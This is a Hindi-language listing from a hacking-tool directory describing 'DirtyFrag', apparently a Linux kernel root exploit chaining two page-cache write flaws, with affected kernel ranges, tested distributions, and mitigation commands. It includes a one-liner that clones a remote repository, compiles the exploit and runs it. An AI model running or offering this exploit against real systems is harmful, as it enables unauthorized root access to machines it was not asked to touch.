Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
DirtyFrag — Linux kernel exploit chain (CVE-2026-43284 और CVE-2026-43500) जो xfrm-ESP और RxRPC page-cache write vulnerabilities के माध्यम से root प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/minime794/dirtyfrag
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणबाइनरी शोषण
GitHubminime794/dirtyfrag

DirtyFrag

Linux kernel exploit chain (CVE-2026-43284 और CVE-2026-43500) जो xfrm-ESP और RxRPC page-cache write vulnerabilities के माध्यम से root प्राप्त करता है।

रिपॉजिटरी देखें
6घं 24मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Dirty-Frag

Linux CVE-2026-43284 और CVE-2026-43500

@V4bel से कॉपी किया गया :) धन्यवाद :)

यह दस्तावेज़ Dirty Frag भेद्यता वर्ग का वर्णन करता है, जिसे पहली बार Hyunwoo Kim (@v4bel) द्वारा खोजा और रिपोर्ट किया गया था, जो xfrm-ESP Page-Cache Write (CVE-2026-43284) भेद्यता और RxRPC Page-Cache Write (CVE-2026-43500) भेद्यता को श्रृंखलाबद्ध करके प्रमुख Linux वितरणों पर root विशेषाधिकार प्राप्त कर सकता है।

Dirty Frag एक ऐसा मामला है जो उस बग वर्ग का विस्तार करता है जिससे Dirty Pipe और Copy Fail संबंधित हैं। चूँकि यह एक नियतात्मक लॉजिक बग है जो किसी टाइमिंग विंडो पर निर्भर नहीं करता, किसी race condition की आवश्यकता नहीं होती, exploit विफल होने पर kernel panic नहीं होता, और सफलता दर बहुत उच्च होती है।

विस्तृत तकनीकी जानकारी और समयरेखा के लिए, यहाँ देखें।

root@kitploit:~
xfrm-ESP Page-Cache Write (CVE-2026-43284) को mainline f4c50a4034e6 में पैच किया गया था।
RxRPC Page-Cache Write (CVE-2026-43500) को mainline aa54b1d27fe0 में पैच किया गया था।

Exploiting : केवल अधिकृत engagements में चलाएँ !!

Oneliner: git clone https://github.com/Minime794/DirtyFrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Step by Step :

पहले exploit को compile करें, फिर binary को चलाएँ

gcc -O0 -Wall -o exp exp.c -lutil

./exp

!! Cleanup

⚠️ महत्वपूर्ण: इस exploit को चलाने के बाद, page cache दूषित हो जाता है। प्रदूषित page cache को साफ़ करने और सिस्टम स्थिरता सुनिश्चित करने के लिए, या तो यह चलाएँ:

echo 3 > /proc/sys/vm/drop_caches

या सिस्टम को reboot करें। प्रभावित संस्करण

root@kitploit:~
CVE-2026-43284: xfrm-ESP Page-Cache Write भेद्यता cac2661c53f3 (2017-01-17) से लेकर f4c50a4034e6 (2026-05-05) तक के दायरे में है।
CVE-2026-43500: RxRPC Page-Cache Write भेद्यता 2dc334f1a63a (2023-06-08) से लेकर aa54b1d27fe0 (2026-05-10) तक के दायरे में है।

दूसरे शब्दों में, भेद्यताओं का प्रभावी जीवनकाल लगभग 9 वर्ष है।

इस Dirty Frag का परीक्षण निम्नलिखित वितरण संस्करणों पर किया गया है।

root@kitploit:~
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
...

Mitigation

root@kitploit:~
निम्नलिखित कमांड का उपयोग उन modules को हटाने के लिए करें जिनमें भेद्यताएँ होती हैं और page cache को साफ़ करें।

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

root@kitploit:~
एक बार प्रत्येक वितरण द्वारा पैच backport कर दिए जाने के बाद, तदनुसार अपडेट करें।
टूल डाउनलोड करें